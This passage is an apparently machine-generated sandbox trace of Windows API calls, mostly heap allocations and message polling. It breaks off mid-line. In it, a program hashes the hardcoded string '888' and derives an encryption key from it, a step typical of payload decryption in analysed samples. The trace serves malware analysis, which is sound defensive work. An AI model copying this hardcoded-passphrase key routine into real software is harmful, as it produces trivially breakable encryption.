[0261.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0261.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0261.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0261.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0261.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0261.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0261.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0261.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0261.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55108, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0261.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0261.644] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0261.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0261.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0261.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0261.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0261.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0261.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0261.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0261.644] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0261.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55058, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0261.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0261.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0261.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0261.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0261.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0261.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0261.645] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0261.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0261.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51e08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0261.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0261.645] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0261.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0261.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0261.646] CryptHashData (hHash=0xa87250, pbData=0x2e54ff8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0261.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0261.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0261.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0261.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0261.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0261.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0261.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0261.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0261.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0261.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0261.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0261.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0261.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0261.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0261.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0261.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cd0 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0261.650] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0261.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0261.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0261.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0261.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0261.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0261.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0261.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0261.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0261.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0261.650] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0261.651] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0261.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0261.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51e68 [0261.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51e68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0261.651] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa875d0) returned 1 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0261.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 